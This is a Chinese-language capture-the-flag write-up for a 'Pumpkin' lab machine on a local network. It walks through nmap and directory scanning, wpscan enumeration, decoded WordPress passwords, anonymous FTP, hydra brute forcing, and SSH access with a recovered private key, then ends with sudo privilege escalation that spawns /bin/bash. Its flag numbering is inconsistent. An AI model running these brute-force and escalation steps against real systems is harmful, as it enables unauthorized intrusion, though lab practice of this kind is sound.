靶机设置
设置靶机为NAT模式
靶机IP发现
nmap 192.168.112.0/24
靶机ip为192.168.112.145
目录扫描
dirsearch 192.168.112.145
访问浏览器(第一个token值)
查看源码,发现一串token值
PumpkinToken : 45d9ee7239bc6b0bb21d3f8e1c5faa52
目录拼接(第二、三、四个token值)
拼接/robots.txt(第二个token值)
拼接/wordpress/
拼接/tokens/(第二个token值)
发现被拒绝
拼接token.txt
发现第二个token值
PumpkinToken : 2c0e11d2200e2604587c331f02a7ebea
拼接/users/
拼接/store/track.txt
发现需要绑定hosts文件
192.168.112.145 pumpkins.local
拼接 pumpkins.local(第三、四个token值)
发现第三个token值
PumpkinToken : 06c3eb12ef2389e2752335beccfb2080
拼接/license.txt(第四个token值)
发现第四个token值
PumpkinToken : 5ff346114d634a015ce413e1bc3d8d71
后台登陆(第五、六个token值)
wpscan --url http://pumpkins.local -e at -e ap -e u
扫描出两个用户
admin
morse
还发现了一个readme.html
发现了一串base62编码
K82v0SuvV1En350M0uxiXVRTmBrQIJQN78s
解密后得到
morse & jack : Ug0t!TrIpyJ
访问http://pumpkins.local/wp-login.php登陆
登陆成功
发现第四个token值
PumpkinToken : 7139e925fd43618653e51f820bc6201b
之前发现的一个值Alohomora!可能是admin账号的密码
尝试登陆
登录成功
发现了第五个token值
PumpkinToken : f2e00edc353309b40e1aed18e18ab2c4
ftp登陆(第七、八、九个token值)
尝试匿名登陆
登陆成功
发现secret中有一个token.txt文件
下载
get token.txt
发现第六个token值
PumpkinToken : 2d6dbbae84d724409606eddd9dd71265
使用hydra破解harry用户的密码
hydra -l harry -P rockyou.txt 192.168.112.145 ftp -e nsr
账号:harry
密码:yrrah
ftp再次登录
登陆成功
发现token.txt文件
下载
get token.txt
查看文件
发现第七个token值
PumpkinToken : ba9fa9abf2be9373b7cbd9a6457f374e
便利Donotopen目录
发现token.txt文件
发现第八个token值
PumpkinToken : f9c5053d01e0dfc30066476ab0f0564c
getshell
进入和token.txt同级的目录中继续遍历,发现了一个data.txt文件
下载下来
查看发现是乱码
查看类型发现是tar压缩包
tar vxf data.txt
tar xjf data
tar vxf key
cat jack
发现为16进制文件
使用 xxd 将 hexdump 转换,得到一个私钥
xxd -r -p jack
chmod 600 aaa
ssh -i aaa jack@192.168.112.145 -p 6880
拿到shell
提权(第十个token值)
查看目录,发现一个token乱码文件
./token
得到第十个token值
8d66ef0055b43d80c34917ec6c75f706
sudo -l查看免密操作
mkdir pumpkins
cd pumpkins
vi alohomora
/bin/bash
chmod 777 alohomora
sudo ./alohomora
提权成功